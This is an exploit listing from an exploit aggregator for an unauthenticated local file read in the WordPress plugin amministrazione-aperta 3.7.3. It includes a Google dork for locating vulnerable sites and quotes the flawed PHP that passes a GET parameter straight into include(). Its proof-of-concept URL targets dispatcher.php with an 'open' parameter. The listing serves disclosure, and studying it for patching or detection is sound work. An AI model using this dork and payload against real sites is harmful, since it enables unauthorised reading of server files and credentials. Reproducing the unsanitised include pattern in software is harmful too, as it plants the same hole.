Exploit for WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read

Name: Exploit for WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read
Rating: 5 (183 reviews)

2022-03-23 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:166407
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated  
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/  
# Date: 23-03-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/  
# Version: 3.7.3  
# Tested on: Firefox  
  
# Vulnerable File: dispatcher.php  
  
# Vulnerable Code:  
  
```  
if ( isset($_GET['open']) ) {  
include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);  
} else {  
echo '  
<div id="welcome-panel" class="welcome-panel"  
style="padding-bottom: 20px;">  
<div class="welcome-panel-column-container">';  
  
include_once( ABSPATH . WPINC . '/feed.php' );  
```  
  
# Proof of Concept:  
  
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]